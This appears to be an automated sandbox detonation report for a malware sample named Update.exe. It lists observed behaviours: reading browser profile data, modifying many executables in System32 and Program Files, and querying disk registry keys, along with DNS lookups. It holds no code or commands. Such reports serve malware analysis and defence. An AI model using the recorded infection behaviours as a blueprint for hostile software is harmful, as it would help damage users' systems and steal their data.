Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
97s
Max time network
141s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo7I.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo7I.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/4408-0-0x00007FF640200000-0x00007FF640719000-memory.dmp
memory/4408-1-0x00007FF640200000-0x00007FF640719000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
157s
Command Line
Signatures
Executes dropped EXE
Reads user/profile data of web browsers
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\AppVClient.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Windows\system32\msiexec.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Windows\System32\SensorDataService.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Windows\System32\alg.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe | N/A |
| File opened for modification | C:\Windows\system32\msiexec.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe | N/A |
| File opened for modification | C:\Windows\system32\dllhost.exe | C:\Windows\system32\TieringEngineService.exe | N/A |
| File opened for modification | C:\Windows\system32\SgrmBroker.exe | C:\Windows\System32\vds.exe | N/A |
| File opened for modification | C:\Windows\System32\snmptrap.exe | C:\Windows\system32\wbem\WmiApSrv.exe | N/A |
| File opened for modification | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | C:\Windows\System32\alg.exe | N/A |
| File opened for modification | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Windows\system32\AppVClient.exe | C:\Windows\system32\TieringEngineService.exe | N/A |
| File opened for modification | C:\Windows\System32\vds.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | C:\Windows\system32\wbengine.exe | N/A |
| File opened for modification | C:\Windows\System32\OpenSSH\ssh-agent.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Windows\system32\fxssvc.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Windows\system32\SgrmBroker.exe | C:\Windows\system32\wbengine.exe | N/A |
| File opened for modification | C:\Windows\system32\SgrmBroker.exe | C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe | N/A |
| File opened for modification | C:\Windows\System32\snmptrap.exe | C:\Windows\system32\TieringEngineService.exe | N/A |
| File opened for modification | C:\Windows\System32\OpenSSH\ssh-agent.exe | C:\Windows\System32\vds.exe | N/A |
| File opened for modification | C:\Windows\system32\AppVClient.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Windows\system32\msiexec.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\4f490c8b76bd8ed3.bin | C:\Windows\System32\alg.exe | N/A |
| File opened for modification | C:\Windows\system32\SearchIndexer.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe | N/A |
| File opened for modification | C:\Windows\system32\msiexec.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Windows\system32\fxssvc.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | C:\Windows\system32\TieringEngineService.exe | N/A |
| File opened for modification | C:\Windows\system32\fxssvc.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\system32\AgentService.exe | \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE | N/A |
| File opened for modification | C:\Windows\system32\dllhost.exe | \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE | N/A |
| File opened for modification | C:\Windows\system32\AppVClient.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Windows\system32\dllhost.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Windows\system32\SgrmBroker.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Windows\system32\AgentService.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\System32\msdtc.exe | C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe | N/A |
| File opened for modification | C:\Windows\system32\fxssvc.exe | C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe | N/A |
| File opened for modification | C:\Windows\system32\msiexec.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\system32\SgrmBroker.exe | C:\Windows\System32\alg.exe | N/A |
| File opened for modification | C:\Windows\system32\SgrmBroker.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\system32\dllhost.exe | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | N/A |
| File opened for modification | C:\Windows\System32\SensorDataService.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\system32\AgentService.exe | C:\Windows\system32\vssvc.exe | N/A |
| File opened for modification | C:\Windows\System32\SensorDataService.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\WmiApSrv.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe | N/A |
| File opened for modification | C:\Windows\system32\TieringEngineService.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Windows\system32\SgrmBroker.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\system32\AgentService.exe | C:\Windows\System32\alg.exe | N/A |
| File opened for modification | C:\Windows\system32\locator.exe | C:\Windows\system32\wbengine.exe | N/A |
| File opened for modification | C:\Windows\System32\vds.exe | C:\Windows\System32\alg.exe | N/A |
| File opened for modification | C:\Windows\system32\AppVClient.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Windows\system32\AgentService.exe | C:\Windows\system32\wbengine.exe | N/A |
| File opened for modification | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | C:\Windows\system32\vssvc.exe | N/A |
| File opened for modification | C:\Windows\system32\fxssvc.exe | C:\Windows\System32\vds.exe | N/A |
| File opened for modification | C:\Windows\System32\OpenSSH\ssh-agent.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\system32\SearchIndexer.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\System32\SensorDataService.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Windows\system32\dllhost.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\system32\AgentService.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Windows\system32\dllhost.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Windows\system32\AppVClient.exe | \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE | N/A |
| File opened for modification | C:\Windows\System32\SensorDataService.exe | C:\Windows\system32\wbengine.exe | N/A |
| File opened for modification | C:\Windows\system32\dllhost.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Windows\system32\AppVClient.exe | C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe | N/A |
| File opened for modification | C:\Windows\system32\msiexec.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Windows\system32\dllhost.exe | C:\Windows\system32\wbem\WmiApSrv.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Mozilla Firefox\default-browser-agent.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\orbd.exe | C:\Windows\system32\TieringEngineService.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jabswitch.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\policytool.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\schemagen.exe | C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\mip.exe | C:\Windows\System32\vds.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateBroker.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zG.exe | C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe | C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe | C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jabswitch.exe | C:\Windows\system32\TieringEngineService.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe | C:\Windows\system32\TieringEngineService.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javapackager.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateBroker.exe | C:\Windows\System32\alg.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe | \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE | N/A |
| File opened for modification | C:\Program Files (x86)\Internet Explorer\ielowutil.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\javaw.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe | C:\Windows\System32\vds.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jconsole.exe | C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\klist.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe | C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe | C:\Windows\system32\wbem\WmiApSrv.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\kinit.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\keytool.exe | C:\Windows\System32\alg.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\kinit.exe | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\servertool.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\updater.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe | C:\Windows\System32\vds.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\rmic.exe | C:\Windows\system32\wbem\WmiApSrv.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\iediagcmd.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome_proxy.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Internet Explorer\ieinstal.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\rmic.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\iexplore.exe | C:\Windows\System32\OpenSSH\ssh-agent.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\dotnet.exe | C:\Windows\System32\vds.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javaws.exe | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jabswitch.exe | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe | C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\unpack200.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\ktab.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\uninstall.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\NisSrv.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler64.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\policytool.exe | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaws.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\orbd.exe | \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javac.exe | C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe | C:\Windows\System32\vds.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\ieinstal.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\kinit.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jjs.exe | C:\Windows\system32\spectrum.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\System32\alg.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\wbem\WmiApSrv.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\System32\OpenSSH\ssh-agent.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\System32\vds.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\wbengine.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE | N/A |
| File opened for modification | C:\Windows\DtcInstall.log | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Windows\DtcInstall.log | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\TieringEngineService.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\vssvc.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\System32\msdtc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\System32\SensorDataService.exe | N/A |
